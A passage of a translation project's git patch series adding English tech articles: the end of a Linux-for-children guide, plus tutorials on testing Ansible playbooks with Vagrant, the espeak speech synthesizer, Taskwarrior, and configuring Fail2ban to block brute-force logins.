don't mind digging into proxy settings, this is the most powerful choice. + +Setting up DansGuardian is not an easy task, and you can follow the installation instructions on its main page. But once it is set up, it is a very effective tool to filter out unwanted content. + +### 2. Parental Control: Family Friendly Filter + +[Parental Control: Family Friendly Filter][7] is an extension for Firefox that allows parents to block sites containing pornography and any other kind of inappropriate material. You can blacklist particular domains so that bad websites are always blocked. + +![firefox-content-filter-addon][8] + +If you are still using an older version of Firefox that doesn't support [web extensions][9], then you can check out [ProCon Latte Content Filter][10]. Parents add domains to a pre-loaded blacklist and set a password to keep the extension from being modified. + +### 3. Blocksi Web Filter + +[Blocksi Web Filter][11] is an extension for Chrome and is useful for Web and Youtube filtering. It also comes with a time-access control so that you can limit the hours your kids can access the Web. + +## Fun Stuff + +![linux-for-children-tux-kart][12] + +Any computer for children better have some games on it, educational or otherwise. While Linux isn't as gaming-friendly as Windows, it's getting closer all the time. Here are several suggestions for constructive games you might load on to Linux for children: + +* [Super Tux Kart][21] (kart racing game) + +* [GCompris][22] (educational game suite) + +* [Secret Maryo Chronicles][23] (Super Mario clone) + +* [Childsplay][24] (educational/memory games) + +* [EToys][25] (programming for kids) + +* [TuxTyping][26], (typing game) + +* [Kalzium][27] (periodic table guide) + +* [Tux of Math Command][28] (math arcade games) + +* [Pink Pony][29] (Tron-like racing game) + +* [KTuberling][30] (constructor game) + +* [TuxPaint][31] (painting) + +* [Blinken][32] ([memory][33] game) + +* [KTurtle][34] (educational programming environment) + +* [KStars][35] (desktop planetarium) + +* [Marble][36] (virtual globe) + +* [KHangman][37] (hangman guessing game) + +## Conclusion: Why Linux for Children? + +Linux has a reputation for being needlessly complex. So why use Linux for children? It's about setting kids up to learn. Working with Linux provides many opportunities to learn how the operating system works. As children get older, they'll have opportunities to explore, driven by their own interests and curiosity. Because the Linux platform is so open to users, it's an excellent venue for children to discover a life-long love of computers. + +This article was first published in July 2010 and was updated in December 2017. + +Image by [Children at school][13] + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/configure-linux-for-children/ + +作者:[Alexander Fox][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/alexfox/ +[1]:https://www.maketecheasier.com/assets/uploads/2010/08/qimo-gcompris.jpg (qimo-gcompris) +[2]:http://www.edubuntu.org +[3]:http://www.ubermix.org/ +[4]:http://wiki.sugarlabs.org/go/Downloads +[5]:https://www.maketecheasier.com/assets/uploads/2017/12/linux-for-children-content-filtering.png (linux-for-children-content-filtering) +[6]:https://help.ubuntu.com/community/DansGuardian +[7]:https://addons.mozilla.org/en-US/firefox/addon/family-friendly-filter/ +[8]:https://www.maketecheasier.com/assets/uploads/2017/12/firefox-content-filter-addon.png (firefox-content-filter-addon) +[9]:https://www.maketecheasier.com/best-firefox-web-extensions/ +[10]:https://addons.mozilla.org/en-US/firefox/addon/procon-latte/ +[11]:https://chrome.google.com/webstore/detail/blocksi-web-filter/pgmjaihnmedpcdkjcgigocogcbffgkbn?hl=en +[12]:https://www.maketecheasier.com/assets/uploads/2017/12/linux-for-children-tux-kart-e1513389774535.jpg (linux-for-children-tux-kart) +[13]:https://www.flickr.com/photos/lupuca/8720604364 +[21]:http://supertuxkart.sourceforge.net/ +[22]:http://gcompris.net/ +[23]:http://www.secretmaryo.org/ +[24]:http://www.schoolsplay.org/ +[25]:http://www.squeakland.org/about/intro/ +[26]:http://tux4kids.alioth.debian.org/tuxtype/index.php +[27]:http://edu.kde.org/kalzium/ +[28]:http://tux4kids.alioth.debian.org/tuxmath/index.php +[29]:http://code.google.com/p/pink-pony/ +[30]:http://games.kde.org/game.php?game=ktuberling +[31]:http://www.tuxpaint.org/ +[32]:https://www.kde.org/applications/education/blinken/ +[33]:https://www.ebay.com/sch/i.html?_nkw=memory +[34]:https://www.kde.org/applications/education/kturtle/ +[35]:https://www.kde.org/applications/education/kstars/ +[36]:https://www.kde.org/applications/education/marble/ +[37]:https://www.kde.org/applications/education/khangman/ From 2e8d4c0acff714e137d1c54e7d63b7a3ea0c860d Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 18:59:30 +0800 Subject: [PATCH 0887/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Testing=20Ansib?= =?UTF-8?q?le=20Playbooks=20With=20Vagrant?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Testing Ansible Playbooks With Vagrant.md | 130 ++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 sources/tech/20171228 Testing Ansible Playbooks With Vagrant.md diff --git a/sources/tech/20171228 Testing Ansible Playbooks With Vagrant.md b/sources/tech/20171228 Testing Ansible Playbooks With Vagrant.md new file mode 100644 index 0000000000..a49a1a447f --- /dev/null +++ b/sources/tech/20171228 Testing Ansible Playbooks With Vagrant.md @@ -0,0 +1,130 @@ +translating by lujun9972 +Testing Ansible Playbooks With Vagrant +====== +I use Ansible to automate the deployments of my websites ([LinuxJobs.fr][1], [Journal du hacker][2]) and my applications ([Feed2toot][3], [Feed2tweet][4]). I'll describe in this blog post my setup in order to test my Ansible Playbooks locally on my laptop. + +![ansible](https://carlchenet.com/wp-content/uploads/2017/12/ansible-300x300.png) + +### Why testing the Ansible Playbooks + +I need a simple and a fast way to test the deployments of my Ansible Playbooks locally on my laptop, especially at the beginning of writing a new Playbook, because deploying directly on the production server is both reeeeally slow… and risky for my services in production. + +Instead of deploying on a remote server, I'll deploy my Playbooks on a [VirtualBox][5] using [Vagrant][6]. This allows getting quickly the result of a new modification, iterating and fixing as fast as possible. + +Disclaimer: I am not a profesionnal programmer. There might exist better solutions and I'm only describing one solution of testing Ansible Playbooks I find both easy and efficient for my own use cases. + +### My process + + 1. Begin writing the new Ansible Playbook + 2. Launch a fresh virtual machine (VM) and deploy the playbook on this VM using Vagrant + 3. Fix the issues either from the playbook either from the application deployed by Ansible itself + 4. Relaunch the deployment on the VM + 5. If more errors, go back to step 3. Otherwise destroy the VM, recreate it and deploy to test a last time with a fresh install + 6. If no error remains, tag the version of your Ansible Playbook and you're ready to deploy in production + + + +### What you need + +First, you need Virtualbox. If you use the [Debian][7] distribution, [this link][8] describes how to install it, either from the Debian repositories either from the upstream. + +[![][9]][5] + +Second, you need Vagrant. Why Vagrant? Because it's a kind of middleware between your development environment and your virtual machine, allowing programmatically reproducible operations and easy linking your deployments and the virtual machine. Install it with the following command: +``` +# apt install vagrant +``` + +[![][10]][6] + +### Setting up Vagrant + +Everything about Vagrant lies in the file Vagrantfile. Here is mine: +``` +Vagrant.require_version ">= 2.0.0" + +Vagrant.configure(1) do |config| + + config.vm.box = "debian/stretch64" + config.vm.provision "shell", inline: "apt install --yes git python3-pip" + config.vm.provision "ansible" do |ansible| + ansible.verbose = "v" + ansible.playbook = "site.yml" + ansible.vault_password_file = "vault_password_file" + end +end + +``` + 1. The 1st line defines what versions of Vagrant should execute your Vagrantfile. + 2. The first loop of the file, you could define the following operations for as many virtual machines as you wish (here just 1). + 3. The 3rd line defines the official Vagrant image we'll use for the virtual machine. + 4. The 4th line is really important: those are the missing apps we miss on the VM. Here we install git and python3-pip with apt. + 5. The next line indicates the start of the Ansible configuration. + 6. On the 6th line, we want a verbose output of Ansible. + 7. On the 7th line, we define the entry point of your Ansible Playbook. + 8. On the 8th line, if you use Ansible Vault to encrypt some files, just define here the file with your Ansible Vault passphrase. + + + +When Vagrant launches Ansible, it's going to launch something like: +``` +$  ansible-playbook --inventory-file=/home/me/ansible/test-ansible-playbook/.vagrant/provisioners/ansible/inventory -v --vault-password-file=vault_password_file site.yml +``` + +### Executing Vagrant + +After writing your Vagrantfile, you need to launch your VM. It's as simple as using the following command: +``` +$ vagrant up +``` + +That's a slow operation, because the VM will be launched, the additionnal apps you defined in the Vagrantfile will be installed and finally your Playbook will be deployed on it. You should sparsely use it. + +Ok, now we're really ready to iterate fast. Between your different modifications, in order to test your deployments fast and on a regular basis, just use the following command: +``` +$ vagrant provision +``` + +Once your Ansible Playbook is finally ready, usually after lots of iterations (at least that's my case), you should test it on a fresh install, because your different iterations may have modified your virtual machine and could trigger unexpected results. + +In order to test it from a fresh install, use the following command: +``` +$ vagrant destroy && vagrant up +``` + +That's again a slow operation. You should use it when you're pretty sure your Ansible Playbook is almost finished. After testing your deployment on a fresh VM, you're now ready to deploy in production.Or at least better prepared :p + +### Possible improvements? Let me know + +I find the setup described in this blog post quite useful for my use cases. I can iterate quite fast especially when I begin writing a new playbook, not only on the playbook but sometimes on my own latest apps, not yet ready to be deployed in production. Deploying on a remote server would be both slow and dangerous for my services in production. + +I could use a continous integration (CI) server, but that's not the topic of this blog post. As said before, the goal is to iterate as fast as possible in the beginning of writing a new Ansible Playbook. + +Commiting, pushing to your Git repository and waiting for the execution of your CI tests is overkill at the beginning of your Ansible Playbook, when it's full of errors waiting to be debugged one by one. I think CI is more useful later in the life of the Ansible Playbooks, especially when different people work on it and you have a set or code quality rules to enforce. That's only my opinion and it's open to discussion, one more time I'm not a professionnal programmer. + +If you have better solutions to test Ansible Playbooks or to improve the one describe here, let me know by writing a comment or by contacting me through my accounts on social networks below, I'll be delighted to listen to your improvements. + + + + +-------------------------------------------------------------------------------- + +via: https://carlchenet.com/testing-ansible-playbooks-with-vagrant/ + +作者:[Carl Chenet][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://carlchenet.com +[1]:https://www.linuxjobs.fr +[2]:https://www.journalduhacker.net +[3]:https://gitlab.com/chaica/feed2toot +[4]:https://gitlab.com/chaica/feed2tweet +[5]:https://www.virtualbox.org/ +[6]:https://www.vagrantup.com/ +[7]:https://www.debian.org +[8]:https://wiki.debian.org/VirtualBox +[9]:https://carlchenet.com/wp-content/uploads/2017/12/virtualbox-150x150.png +[10]:https://carlchenet.com/wp-content/uploads/2017/12/vagrant-300x98.png From d4d2882f936e8f0ee8a5d9081c4f7b87e0ca8a2b Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 19:09:21 +0800 Subject: [PATCH 0888/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Add=20speech=20?= =?UTF-8?q?to=20your=20Fedora=20system?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...170804 Add speech to your Fedora system.md | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 sources/tech/20170804 Add speech to your Fedora system.md diff --git a/sources/tech/20170804 Add speech to your Fedora system.md b/sources/tech/20170804 Add speech to your Fedora system.md new file mode 100644 index 0000000000..47a6b46131 --- /dev/null +++ b/sources/tech/20170804 Add speech to your Fedora system.md @@ -0,0 +1,69 @@ +translating by lujun9972 +Add speech to your Fedora system +====== + +![](https://fedoramagazine.org/wp-content/uploads/2017/08/espeak-945x400.png) +By default, Fedora Workstation ships a small package called espeak. It adds a speech synthesizer -- that is, text-to-speech software. + +In today's world, talking devices are nothing impressive as they're very common. You can find speech synthesizers even in your smartphone, a product like Amazon Alexa, or in the announcements at the train station. In addition, synthesized voices are nowadays more or less similar to human speech. We live in a 1980s science fiction movie! + +The voice produced by espeak may sound a bit primitive compared to the aforementioned tools. But at the end of the day espeak produces good quality speech. And whether you find it useful or not, at least it can provide some amusement. + +### Running espeak + +In espeak you can set various parameters using command line options. Examples include: + + * amplitude (-a) + * pitch adjustment (-p) + * speed of sentences (-s) + * gap between words (-g) + + + +Each of these options produces various effects and may help you achieve a cleaner voice. + +You can also select different voice variants with command line options. For example, try -ven+m3 for a different English male voice, and -ven+f1 for a female one. You can also use different languages. For a list, run this command: +``` +espeak --voices +``` + +Note that many languages other than English are experimental attempts. + +To create a WAV file instead of actually speaking something, use the -w option: +``` +espeak -w out.wav "Audio file test" +``` + +The espeak utility also reads the content of a file for you. +``` +espeak -f plaintextfile +``` + +Or you can pass the text to speech from the standard input. In this way, as a simple example, you can build a talking box that alerts you to an event using a voice. Your backup is completed? Add this command to the end of your script: +``` +echo "Backup completed" | espeak -s 160 -a 100 -g 4 +``` + +Suppose an error shows up in a log file: +``` +tail -1F /your/log/file | grep --line-buffered 'ERROR' | espeak +``` + +Or perhaps you want a speaking clock telling you every minute what time it is: +``` +while true; do date +%S | grep '00' && date +%H:%M | espeak; sleep 1; done +``` + +As you can guess, use cases are limited only by your imagination. Enjoy your new talking Fedora system! + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/add-speech-fedora-system/ + +作者:[Author Archive][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://alciregi.id.fedoraproject.org/ From b147c96533c72dff18a263b5033d1c1dd253a15e Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 19:12:03 +0800 Subject: [PATCH 0889/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Getting=20Start?= =?UTF-8?q?ed=20with=20Taskwarrior?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...170213 Getting Started with Taskwarrior.md | 238 ++++++++++++++++++ 1 file changed, 238 insertions(+) create mode 100644 sources/tech/20170213 Getting Started with Taskwarrior.md diff --git a/sources/tech/20170213 Getting Started with Taskwarrior.md b/sources/tech/20170213 Getting Started with Taskwarrior.md new file mode 100644 index 0000000000..3fccc15498 --- /dev/null +++ b/sources/tech/20170213 Getting Started with Taskwarrior.md @@ -0,0 +1,238 @@ +Getting Started with Taskwarrior +====== +Taskwarrior is a flexible [command-line task management program][1]. In their [own words][2]: + +Taskwarrior manages your TODO list from your command line. It is flexible, fast, efficient, unobtrusive, does its job then gets out of your way. + +Taskwarrior is highly customizable, but can also be used "right out of the box." In this article, we'll show you the basic commands to add and complete tasks. Then we'll cover a couple more advanced commands. And finally, we'll show you some basic configuration settings to begin customizing your setup. + +### Installing Taskwarrior + +Taskwarrior is available in the Fedora repositories, so installing it is simple: +``` +sudo dnf install task + +``` + +Once installed, run `task`. This first run will create a `~/.taskrc` file for you. +``` +$ **task** +A configuration file could not be found in ~ + +Would you like a sample /home/link/.taskrc created, so Taskwarrior can proceed? (yes/no) yes +[task next] +No matches. + +``` + +### Adding Tasks + +Adding tasks is fast and unobtrusive. +``` +$ **task add Plant the wheat** +Created task 1. + +``` + +Run `task` or `task list` to show upcoming tasks. +``` +$ **task list** + +ID Age Description Urg + 1 8s Plant the wheat 0 + +1 task + +``` + +Let's add a few more tasks to round out the example. +``` +$ **task add Tend the wheat** +Created task 2. +$ **task add Cut the wheat** +Created task 3. +$ **task add Take the wheat to the mill to be ground into flour** +Created task 4. +$ **task add Bake a cake** +Created task 5. + +``` + +Run `task` again to view the list. +``` +[task next] + +ID Age Description Urg + 1 3min Plant the wheat 0 + 2 22s Tend the wheat 0 + 3 16s Cut the wheat 0 + 4 8s Take the wheat to the mill to be ground into flour 0 + 5 2s Bake a cake 0 + +5 tasks + +``` + +### Completing Tasks + +To mark a task as complete, look up its ID and run: +``` +$ **task 1 done** +Completed task 1 'Plant the wheat'. +Completed 1 task. + +``` + +You can also mark a task done with its description. +``` +$ **task 'Tend the wheat' done** +Completed task 1 'Tend the wheat'. +Completed 1 task. + +``` + +With `add`, `list` and `done`, you're all ready to get started with Taskwarrior. + +### Setting Due Dates + +Many tasks do not require a due date: +``` +task add Finish the article on Taskwarrior + +``` + +But sometimes, setting a due date is just the kind of motivation you need to get productive. Use the `due` modifier when adding a task to set a specific due date. +``` +task add Finish the article on Taskwarrior due:tomorrow + +``` + +`due` is highly flexible. It accepts specific dates ("2017-02-02"), or ISO-8601 ("2017-02-02T20:53:00Z"), or even relative time ("8hrs"). See the [Date & Time][3] documentation for all the examples. + +Dates go beyond due dates too. Taskwarrior has `scheduled`, `wait`, and `until`. +``` +task add Proof the article on Taskwarrior scheduled:thurs + +``` + +Once the date (Thursday in this example) passes, the task is tagged with the `READY` virtual tag. It will then show up in the `ready` report. +``` +$ **task ready** + +ID Age S Description Urg + 1 2s 1d Proof the article on Taskwarrior 5 + +``` + +To remove a date, `modify` the task with a blank value: +``` +$ task 1 modify scheduled: + +``` + +### Searching Tasks + +No task list is complete without the ability to search with regular expressions, right? +``` +$ **task '/.* the wheat/' list** + +ID Age Project Description Urg + 2 42min Take the wheat to the mill to be ground into flour 0 + 1 42min Home Cut the wheat 1 + +2 tasks + +``` + +### Customizing Taskwarrior + +Remember that file we created back in the beginning (`~/.taskrc`). Let's take at the defaults: +``` +# [Created by task 2.5.1 2/9/2017 16:39:14] +# Taskwarrior program configuration file. +# For more documentation, see http://taskwarrior.org or try 'man task', 'man task-color', +# 'man task-sync' or 'man taskrc' + +# Here is an example of entries that use the default, override and blank values +# variable=foo -- By specifying a value, this overrides the default +# variable= -- By specifying no value, this means no default +# #variable=foo -- By commenting out the line, or deleting it, this uses the default + +# Use the command 'task show' to see all defaults and overrides + +# Files +data.location=~/.task + +# Color theme (uncomment one to use) +#include /usr//usr/share/task/light-16.theme +#include /usr//usr/share/task/light-256.theme +#include /usr//usr/share/task/dark-16.theme +#include /usr//usr/share/task/dark-256.theme +#include /usr//usr/share/task/dark-red-256.theme +#include /usr//usr/share/task/dark-green-256.theme +#include /usr//usr/share/task/dark-blue-256.theme +#include /usr//usr/share/task/dark-violets-256.theme +#include /usr//usr/share/task/dark-yellow-green.theme +#include /usr//usr/share/task/dark-gray-256.theme +#include /usr//usr/share/task/dark-gray-blue-256.theme +#include /usr//usr/share/task/solarized-dark-256.theme +#include /usr//usr/share/task/solarized-light-256.theme +#include /usr//usr/share/task/no-color.theme + + +``` + +The only active option right now is `data.location=~/.task`. To view active configuration settings (including the built-in defaults), run `show`. +``` +task show + +``` + +To change a setting, use `config`. +``` +$ **task config displayweeknumber no** +Are you sure you want to add 'displayweeknumber' with a value of 'no'? (yes/no) yes +Config file /home/link/.taskrc modified. + +``` + +### Examples + +These are just some of the things you can do with Taskwarrior. + +Assign a project to your tasks: +``` +task 'Fix leak in the roof' modify project:Home + +``` + +Use `start` to mark what you were working on. This can help you remember what you were working on after the weekend: +``` +task 'Fix bug #141291' start + +``` + +Use relevant tags: +``` +task add 'Clean gutters' +weekend +house + +``` + +Be sure to read the [complete documentation][4] to learn all the ways you can catalog and organize your tasks. + + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/getting-started-taskwarrior/ + +作者:[Link Dupont][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org/author/linkdupont/ +[1]:https://taskwarrior.org/ +[2]:https://taskwarrior.org/docs/start.html +[3]:https://taskwarrior.org/docs/dates.html +[4]:https://taskwarrior.org/docs/ From 13647f49885a14aa40c2d9d2195d289d915014d9 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:08:04 +0800 Subject: [PATCH 0890/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Prot?= =?UTF-8?q?ect=20Server=20Against=20Brute=20Force=20Attacks=20With=20Fail2?= =?UTF-8?q?ban=20On=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...te Force Attacks With Fail2ban On Linux.md | 237 ++++++++++++++++++ 1 file changed, 237 insertions(+) create mode 100644 sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md diff --git a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md b/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md new file mode 100644 index 0000000000..0a1a27855e --- /dev/null +++ b/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md @@ -0,0 +1,237 @@ +How To Protect Server Against Brute Force Attacks With Fail2ban On Linux +====== +One of the important task for Linux administrator is to protect server against illegitimate attack or access. By default Linux system comes with well-configured firewall such as Iptables, Uncomplicated Firewall (UFW), ConfigServer Security Firewall (CSF), etc, which will prevent many kinds of attacks. + +Any machine which is connected to the internet is a potential target for malicious attacks. There is a tool called fail2ban is available to mitigate illegitimate access on server. + +### What Is Fail2ban? + +[Fail2ban][1] is an intrusion prevention software, framework which protect server against brute force attacks. It's Written in Python programming language. Fail2ban work based on auth log files, by default it will scan the auth log files such as `/var/log/auth.log`, `/var/log/apache/access.log`, etc.. and bans IPs that show the malicious signs, too many password failures, seeking for exploits, etc. + +Generally fail2Ban is used to update firewall rules to reject the IP addresses for a specified amount of time. Also it will send mail notification too. Fail2Ban comes with many filters for various services such as ssh, apache, nginx, squid, named, mysql, nagios, etc,. + +Fail2Ban is able to reduce the rate of incorrect authentications attempts however it cannot eliminate the risk that weak authentication presents. this is one of the security for server which will prevent brute force attacks. + +### How to Install Fail2ban In Linux + +Fail2ban is already packaged with most of the Linux distribution so, just use you distribution package manager to install it. + +For **`Debian/Ubuntu`** , use [APT-GET Command][2] or [APT Command][3] to install tilda. +``` +$ sudo apt install fail2ban + +``` + +For **`Fedora`** , use [DNF Command][4] to install tilda. +``` +$ sudo dnf install fail2ban + +``` + +For **`CentOS/RHEL`** systems, enable [EPEL Repository][5] or [RPMForge Repository][6] and use [YUM Command][7] to install Terminator. +``` +$ sudo yum install fail2ban + +``` + +For **`Arch Linux`** , use [Pacman Command][8] to install tilda. +``` +$ sudo pacman -S fail2ban + +``` + +For **`openSUSE`** , use [Zypper Command][9] to install tilda. +``` +$ sudo zypper in fail2ban + +``` + +### How To Configure Fail2ban + +By default Fail2ban keeps all the configuration files in `/etc/fail2ban/` directory. The main configuration file is `jail.conf`, it contains a set of pre-defined filters. So, don't edit the file and it's not advisable because whenever new update comes the configuration get reset to default. + +Just create a new configuration file called `jail.local` in the same directory and modify as per your wish. +``` +# cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local + +``` + +By default most of the option was configured perfectly and if you want to enable access to any particular IP then you can add the IP address into `ignoreip` area, for more then one IP give a speace between the IP address. + +The `DEFAULT` section contains the basic set of rules that Fail2Ban follow and you can adjust any parameter as per your wish. +``` +# nano /etc/fail2ban/jail.local + +[DEFAULT] +ignoreip = 127.0.0.1/8 192.168.1.100/24 +bantime = 600 +findtime = 600 +maxretry = 3 +destemail = 2daygeek@gmail.com + +``` + + * **ignoreip :** This section allow us to whitelist the list of IP address and Fail2ban will not ban a host which matches an address in this list + * **bantime :** The number of seconds that a host is banned + * **findtime :** A host is banned if it has generated "maxretry" during the last "findtime" seconds + * **maxretry :** "maxretry" is the number of failures before a host get banned. + + + +### How To Configure Service + +Fail2ban comes with set of pre-defined filters for various servicess such as ssh, apache, nginx, squid, named, mysql, nagios, etc,. We don't want to make any changes on configuration file and just add following line `enabled = true` in the service area to enable jail to any services. To disable make the line to `false` instead of ture. +``` +# SSH servers +[sshd] +enabled = true +port = ssh +logpath = %(sshd_log)s +backend = %(sshd_backend)s + +``` + + * **enabled :** Determines whether the service is turned on or off. + * **port :** It's refering to the particular service. If using the default port, then the service name can be placed here. If using a non-traditional port, this should be the port number. + * **logpath :** Gives the location of the service's logs./li> + * **backend :** "backend" specifies the backend used to get files modification. + + + +### Restart Fail2Ban + +After making changes restart Fail2Ban to take effect. +``` +[For SysVinit Systems] +# service fail2ban restart + +[For systemd Systems] +# systemctl restart fail2ban.service + +``` + +### Verify Fail2Ban iptables rules + +You can confirm whether Fail2Ban iptables rules are added into firewall using below command. +``` +# iptables -L +Chain INPUT (policy ACCEPT) +target prot opt source destination +f2b-apache-auth tcp -- anywhere anywhere multiport dports http,https +f2b-sshd tcp -- anywhere anywhere multiport dports 1234 +ACCEPT tcp -- anywhere anywhere tcp dpt:1234 + +Chain FORWARD (policy ACCEPT) +target prot opt source destination + +Chain OUTPUT (policy ACCEPT) +target prot opt source destination + +Chain f2b-apache-auth (1 references) +target prot opt source destination +RETURN all -- anywhere anywhere + +Chain f2b-sshd (1 references) +target prot opt source destination +RETURN all -- anywhere anywhere +``` + +### How To Test Fail2ban + +I have made some failed attempts to test this. To confirm this, I'm going to verify the `/var/log/fail2ban.log` file. +``` +2017-11-05 14:43:22,901 fail2ban.server [7141]: INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.9.6 +2017-11-05 14:43:22,987 fail2ban.database [7141]: INFO Connected to fail2ban persistent database '/var/lib/fail2ban/fail2ban.sqlite3' +2017-11-05 14:43:22,996 fail2ban.database [7141]: WARNING New database created. Version '2' +2017-11-05 14:43:22,998 fail2ban.jail [7141]: INFO Creating new jail 'sshd' +2017-11-05 14:43:23,002 fail2ban.jail [7141]: INFO Jail 'sshd' uses poller {} +2017-11-05 14:43:23,019 fail2ban.jail [7141]: INFO Initiated 'polling' backend +2017-11-05 14:43:23,019 fail2ban.filter [7141]: INFO Set maxRetry = 5 +2017-11-05 14:43:23,020 fail2ban.filter [7141]: INFO Set jail log file encoding to UTF-8 +2017-11-05 14:43:23,020 fail2ban.filter [7141]: INFO Added logfile = /var/log/auth.log +2017-11-05 14:43:23,021 fail2ban.actions [7141]: INFO Set banTime = 600 +2017-11-05 14:43:23,021 fail2ban.filter [7141]: INFO Set findtime = 600 +2017-11-05 14:43:23,022 fail2ban.filter [7141]: INFO Set maxlines = 10 +2017-11-05 14:43:23,070 fail2ban.server [7141]: INFO Jail sshd is not a JournalFilter instance +2017-11-05 14:43:23,081 fail2ban.jail [7141]: INFO Jail 'sshd' started +2017-11-05 14:43:23,763 fail2ban.filter [7141]: INFO [sshd] Found 103.5.134.167 +2017-11-05 14:43:23,763 fail2ban.filter [7141]: INFO [sshd] Found 103.5.134.167 +2017-11-05 14:43:23,764 fail2ban.filter [7141]: INFO [sshd] Found 181.129.54.170 +2017-11-05 14:43:23,764 fail2ban.filter [7141]: INFO [sshd] Found 181.129.54.170 +2017-11-05 14:43:23,765 fail2ban.filter [7141]: INFO [sshd] Found 181.129.54.170 +2017-11-05 14:43:23,765 fail2ban.filter [7141]: INFO [sshd] Found 181.129.54.170 +2017-11-05 15:19:06,192 fail2ban.server [7141]: INFO Stopping all jails +2017-11-05 15:19:06,874 fail2ban.jail [7141]: INFO Jail 'sshd' stopped +2017-11-05 15:19:06,879 fail2ban.server [7141]: INFO Exiting Fail2ban +2017-11-05 15:19:07,123 fail2ban.server [8528]: INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.9.6 +2017-11-05 15:19:07,123 fail2ban.database [8528]: INFO Connected to fail2ban persistent database '/var/lib/fail2ban/fail2ban.sqlite3' +2017-11-05 15:19:07,126 fail2ban.jail [8528]: INFO Creating new jail 'sshd' +2017-11-05 15:19:07,129 fail2ban.jail [8528]: INFO Jail 'sshd' uses poller {} +2017-11-05 15:19:07,141 fail2ban.jail [8528]: INFO Initiated 'polling' backend +2017-11-05 15:19:07,142 fail2ban.actions [8528]: INFO Set banTime = 60 +2017-11-05 15:19:07,142 fail2ban.filter [8528]: INFO Set findtime = 60 +2017-11-05 15:19:07,142 fail2ban.filter [8528]: INFO Set jail log file encoding to UTF-8 +2017-11-05 15:19:07,143 fail2ban.filter [8528]: INFO Set maxRetry = 3 +2017-11-05 15:19:07,144 fail2ban.filter [8528]: INFO Added logfile = /var/log/auth.log +2017-11-05 15:19:07,144 fail2ban.filter [8528]: INFO Set maxlines = 10 +2017-11-05 15:19:07,189 fail2ban.server [8528]: INFO Jail sshd is not a JournalFilter instance +2017-11-05 15:19:07,195 fail2ban.jail [8528]: INFO Jail 'sshd' started +2017-11-05 15:20:03,263 fail2ban.filter [8528]: INFO [sshd] Found 103.5.134.167 +2017-11-05 15:20:05,267 fail2ban.filter [8528]: INFO [sshd] Found 103.5.134.167 +2017-11-05 15:20:12,276 fail2ban.filter [8528]: INFO [sshd] Found 103.5.134.167 +2017-11-05 15:20:12,380 fail2ban.actions [8528]: NOTICE [sshd] Ban 103.5.134.167 +2017-11-05 15:21:12,659 fail2ban.actions [8528]: NOTICE [sshd] Unban 103.5.134.167 + +``` + +To Check list of jail enabled, run the following command. +``` +# fail2ban-client status +Status +|- Number of jail: 2 +`- Jail list: apache-auth, sshd + +``` + +To get the blocked Ip address by running following command. +``` +# fail2ban-client status ssh +Status for the jail: ssh +|- filter +| |- File list: /var/log/auth.log +| |- Currently failed: 1 +| `- Total failed: 3 +`- action + |- Currently banned: 1 + | `- IP list: 192.168.1.115 + `- Total banned: 1 + +``` + +To remove blocked IP address from Fail2Ban, run the following command. +``` +# fail2ban-client set ssh unbanip 192.168.1.115 + +``` + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/how-to-install-setup-configure-fail2ban-on-linux/# + +作者:[Magesh Maruthamuthu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.2daygeek.com/author/magesh/ +[1]:https://github.com/fail2ban/fail2ban +[2]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/ +[3]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/ +[4]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/ +[5]:https://www.2daygeek.com/install-enable-epel-repository-on-rhel-centos-scientific-linux-oracle-linux/ 